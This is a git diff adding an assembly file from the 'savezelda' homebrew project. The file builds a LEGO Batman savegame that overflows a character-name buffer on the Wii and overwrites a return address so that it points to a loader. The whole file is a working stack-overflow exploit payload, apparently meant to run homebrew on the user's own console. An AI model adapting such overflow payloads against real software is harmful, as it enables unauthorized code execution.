X-Git-Url: http://wien.tomnetworks.com/gitweb/?p=savezelda.git;a=blobdiff_plain;f=batman%2Fhead.s;fp=batman%2Fhead.s;h=aa5081a8f195210b1eb524d02bddc103d8e1bd78;hp=0000000000000000000000000000000000000000;hb=da886e2a723e5990d209d8fc141dc9bab7bf0424;hpb=4d980dfebbc6faf212cf41a09240104118d8889f

diff --git a/batman/head.s b/batman/head.s
new file mode 100644
index 0000000..aa5081a
--- /dev/null
+++ b/batman/head.s
@@ -0,0 +1,31 @@
+# Copyright      2011  Bernhard Urban <lewurm@gmail.com>
+# This code is licensed to you under the terms of the GNU GPL, version 2;
+# see file COPYING or http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
+
+	retadr = 0x90394140
+0:
+	# stolen from some savegame found in teh intertube
+	.incbin "head.b"
+
+	# give the char a name
+	.ascii "you won't see this  " # len = 0x14
+
+	# smash it \o/ 0x1f0+0x4 bytes all in all...
+	.fill (0xf4/4), 4, 0x11111111
+
+	# unlock the character (somewhere here actually...)
+	.fill (0x10/4), 4, 0x90c10104
+
+	# add more padding...
+	.fill (0xdc/4), 4, 0x11111111
+
+	# now we at the actual vuln return address
+	# just point to the loader of the loader (= content of exploit.s)
+	.long retadr
+
+	# alternatively you can put the code here too and jump into the stack,
+	# however then you have to take care for nullbytes in the resulting
+	# bytecode, which is a way too tedious. so we just take the further slot for
+	# it :-) (LEGO devs are nice ppl, heh)
+
+	.fill 0x10000 - (. - 0b)